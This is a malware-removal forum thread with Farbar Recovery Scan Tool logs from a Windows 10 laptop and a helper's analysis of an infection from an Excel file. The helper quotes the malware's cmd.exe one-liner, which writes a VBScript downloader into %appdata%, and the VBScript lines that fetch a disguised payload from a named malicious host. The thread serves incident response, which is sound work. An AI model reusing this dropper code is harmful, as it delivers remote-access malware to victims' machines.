Faulting application path: C:\WINDOWS\system32\IntelCpHDCPSvc.exe
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: a8ea9bde-d760-4dbc-832c-0766ee78aa5b
Faulting package full name:
Faulting package-relative application ID:
Error: (02/01/2017 09:18:16 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10608.329) TYPE: ERROR
DPTF Build Version: 8.1.10608.329
DPTF Build Date: May 13 2016 11:00:20
Source File: ..\..\..\..\Sources\Policies\PolicyLib\PolicyBase.cpp @ line 673
Executing Function: PolicyBase::takeControlOfOsc
Message: Failed to acquire OSC: Failure during execution of _OSC:
DPTF Build Version: 8.1.10608.329
DPTF Build Date: May 13 2016 11:00:20
Source File: ..\..\..\Sources\Manager\EsifServices.cpp @ line 473
Executing Function: EsifServices::primitiveExecuteSet
Message: Error returned from ESIF services interface function call
Participant: NoParticipant
Domain: NoDomain
ESIF Primitive: SET_OPERATING_SYSTEM_CAPABILITIES [93]
ESIF Instance: 255
ESIF Return Code: ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]
Policy: Passive Policy 2 [2]
Error: (02/01/2017 09:18:16 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10608.329) TYPE: ERROR
DPTF Build Version: 8.1.10608.329
DPTF Build Date: May 13 2016 11:00:20
Source File: ..\..\..\..\Sources\Policies\PolicyLib\PolicyBase.cpp @ line 673
Executing Function: PolicyBase::takeControlOfOsc
Message: Failed to acquire OSC: Failure during execution of _OSC:
DPTF Build Version: 8.1.10608.329
DPTF Build Date: May 13 2016 11:00:20
Source File: ..\..\..\Sources\Manager\EsifServices.cpp @ line 473
Executing Function: EsifServices::primitiveExecuteSet
Message: Error returned from ESIF services interface function call
Participant: NoParticipant
Domain: NoDomain
ESIF Primitive: SET_OPERATING_SYSTEM_CAPABILITIES [93]
ESIF Instance: 255
ESIF Return Code: ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]
Policy: Critical Policy [1]
System errors:
=============
Error: (02/01/2017 09:28:02 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/01/2017 09:27:58 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/01/2017 09:27:54 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/01/2017 09:27:50 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/01/2017 09:27:46 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/01/2017 09:27:42 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/01/2017 09:27:38 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/01/2017 09:27:34 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/01/2017 09:27:30 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (02/01/2017 09:27:26 PM) (Source: disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
CodeIntegrity:
===================================
Date: 2017-02-01 21:18:20.909
Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-02-01 21:18:20.659
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Memory info ===========================
Processor: Intel® Core™ i7-6500U CPU @ 2.50GHz
Percentage of memory in use: 20%
Total physical RAM: 16273.91 MB
Available physical RAM: 12875.87 MB
Total Virtual: 18705.91 MB
Available Virtual: 15290.62 MB
==================== Drives ================================
Drive c: (Windows) (Fixed) (Total:913.93 GB) (Free:825.38 GB) NTFS
Drive d: (RECOVERY) (Fixed) (Total:16.35 GB) (Free:1.88 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (Disc1) (CDROM) (Total:1 GB) (Free:0 GB) UDF
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: D379171D)
Partition: GPT.
==================== End of Addition.txt ============================
Malware Expert
The 6ov.vbs was definitely a piece of malware. This is what it was trying to do:
Dim drgfgd, jhgfsf
Set drgfgd = CreateObject("Microsoft.XMLHTTP")
Set jhgfsf = CreateObject("Adodb.Stream")drgfgd.Open "GET", "http://disk.karelia....etBdl/996.png",False
It basically downloaded a file from http://disk.karelia.pro- when I clicked on the link in my own browser my Avast blocked my going there and said it was a malware site. Supposedly it is downloading a .png file which should have been a picture but it's easy to change the extension once you get the file so it may have been a .exe or a compressed file with several exes in disguise. Scumware.org has some bad things to say about the site:
https://www.scumware...isk.karelia.pro
It does appear to be part of the malware discussed here:
https://www.hybrid-a...vironmentId=100
These lines created your 60v.vbs file:
cmd.exe cmd /c cd "%appdata%" &echo Dim drgfgd, jhgfsf >> 6ov.vbs &echo Set drgfgd = CreateObject("Microsoft.XMLHTTP")>> 6ov.vbs &echo Set jhgfsf = CreateObject("Adodb.Stream")>> 6ov.vbs &echo drgfgd.Open "GET", "http://disk.karelia....etBdl/996.png",False>> 6ov.vbs" (PID: 3672)
Near as I can tell it is trying to install TeamViewer on your system so that someone can access it remotely.
Run FRST again but this time put
update_w32.exe;prtj.exe;svpn.exe;Book.xlt;Sheet.xlt
(no spaces just a semicolon between the file names)
in the box (you can copy the above line and paste it in if you want instead of typing it) then hit Search Files. When it finishes, copy and paste the text from search.txt.
Since you got the infection from an Excel file it may have infected your default Excel template so I'm also having it locate your default templates
Before I forget: You have a bad block on your hard drive. You need to run a disk check. See the instructions on:
http://www.thewindow...cking-windows-8
Ignore the stuff with a vertical line. That's just ads. Skip over them.
You also probably need a new driver for your intel video.
Member
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 29-01-2017
Ran by Joseph (administrator) on JOSEPHW (02-02-2017 12:02:11)
Running from C:\Users\Joseph\Downloads
Loaded Profiles: Joseph (Available Profiles: Joseph)
Platform: Windows 10 Home Version 1607 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation) C:\Windows\SysWOW64\esif_uf.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
() C:\Program Files\CyberLink\Shared files\RichVideo64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(HP Inc.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
Failed to access process -> IntelCpHDCPSvc.exe
(WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
(HP Inc.) C:\Program Files\HPCommRecovery\HPCommRecovery.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Windows\Temp\DPTF\esif_assist_64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
(HP Development Company, L.P.) C:\Program Files (x86)\HP\HP CoolSense\CoolSense.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\msdt.exe
(Microsoft Corporation) C:\Windows\System32\msdt.exe
() C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1701.10102.0_x64__8wekyb3d8bbwe\Calculator.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
==================== Registry (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9181696 2017-01-13] (Realtek Semiconductor)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27262432 2016-12-20] (Skype Technologies S.A.)
HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\Run: [HP Photosmart 6520 series (NET)] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\ScanToPCActivationApp.exe [2573416 2012-10-17] (Hewlett-Packard Co.)
HKU\S-1-5-18\...\RunOnce: [Application Restart #0] => C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe [371928 2016-07-16] (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
Startup: C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2016-10-31]
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{f314d896-c550-4d14-b773-fdf73ec6770f}: [DhcpNameServer] 192.168.1.1
Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://hp15-comm.msn.com/?pc=HRTE
HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp15-comm.msn.com/?pc=HRTE
BHO: Bitdefender Wallet -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-01-13] (Bitdefender)
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2016-12-28] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2016-12-28] (Microsoft Corporation)
BHO-x32: Bitdefender Wallet -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-01-13] (Bitdefender)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-07-21] (HP Inc.)
Toolbar: HKLM - Bitdefender Wallet - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-01-13] (Bitdefender)
Toolbar: HKLM-x32 - Bitdefender Wallet - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-01-13] (Bitdefender)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2016-12-28] (Microsoft Corporation)
Filter-x32: application/x-ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica; charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=euc-jp - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=ISO-8859-1 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS936 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS949 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=MS950 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF-8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: application/x-ica;charset=UTF8 - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
Filter-x32: ica - {CFB6322E-CC85-4d1b-82C7-893888A236BC} - C:\Program Files (x86)\Citrix\ICA Client\IcaMimeFilter.dll [2016-09-05] (Citrix Systems, Inc.)
FireFox:
========
FF DefaultProfile: y2l2kxa2.default
FF ProfilePath: C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default [2017-02-02]
FF Extension: (Adblock Plus) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2017-02-01]
FF Extension: (Diagnostics) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\features\{9ef51dc5-bd5f-423f-8914-b6fd30d03cbc}\[email protected] [2017-02-01]
FF Extension: (Send HSTS Priming Requests) - C:\Users\Joseph\AppData\Roaming\Mozilla\Firefox\Profiles\y2l2kxa2.default\features\{9ef51dc5-bd5f-423f-8914-b6fd30d03cbc}\[email protected] [2017-02-01]
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-01-19]
FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-12-09] (Adobe Systems)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1225195.dll [2016-09-20] (Adobe Systems, Inc.)
FF Plugin-x32: @Citrix.com/npican -> C:\Program Files (x86)\Citrix\ICA Client\npicaN.dll [2016-09-05] (Citrix Systems, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2016-12-28] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2015-12-22] ()
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-12-09] (Adobe Systems)
Chrome:
=======
CHR Plugin: (Widevine Content Decryption Module) - C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\WidevineCdm\_platform_specific\win_x64\widevinecdmadapter.dll (Google Inc.)
CHR Plugin: (Shockwave Flash) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\PepperFlash\24.0.0.194\pepflashplayer.dll ()
CHR Profile: C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default [2017-02-01]
CHR Extension: (Google Docs) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-09-24]
CHR Extension: (Google Drive) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-24]
CHR Extension: (YouTube) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-22]
CHR Extension: (Bitdefender Wallet) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\gannpgaobkkhmpomoijebaigcapoeebl [2017-02-01]
CHR Extension: (Google Docs Offline) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-09-22]
CHR Extension: (AdBlock) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-01-31]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-21]
CHR Extension: (Gmail) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-09-22]
CHR Extension: (Chrome Media Router) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-04]
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [753240 2016-12-09] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2227312 2017-01-19] (Adobe Systems, Incorporated)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [3699904 2016-12-28] (Microsoft Corporation)
S2 cplspcon; C:\WINDOWS\system32\IntelCpHDCPSvc.exe [431088 2016-09-25] (Intel Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
R2 DevMgmtService; C:\Program Files\Bitdefender\Bitdefender Device Management\DevMgmtService.exe [100448 2016-11-29] (Bitdefender)
R2 esifsvc; C:\WINDOWS\SysWoW64\esif_uf.exe [1419424 2016-09-25] (Intel Corporation)
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [349728 2015-12-22] (WildTangent)
R2 HP Comm Recover; C:\Program Files\HPCommRecovery\HPCommRecovery.exe [48128 2016-04-18] (HP Inc.) [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [31776 2016-12-07] (HP Inc.)
R2 HPWMISVC; c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2016-01-11] (HP Inc.)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [19440 2015-11-04] (Intel Corporation)
R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [356336 2016-09-25] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [976848 2016-01-14] (Intel® Corporation)
S3 Intel® WiDi SAM; C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [19088 2015-09-17] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [209184 2016-02-11] (Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268704 2016-08-04] ()
R2 ProductAgentService; C:\Program Files\Bitdefender Agent\ProductAgentService.exe [1100392 2016-10-28] (Bitdefender)
R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [389896 2014-04-14] ()
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [322560 2017-01-13] (Realtek Semiconductor)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [266872 2016-08-19] (Synaptics Incorporated)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe [218416 2017-01-06] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe [1526528 2017-02-01] (Bitdefender)
R2 vsservp; C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe [524872 2016-08-25] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
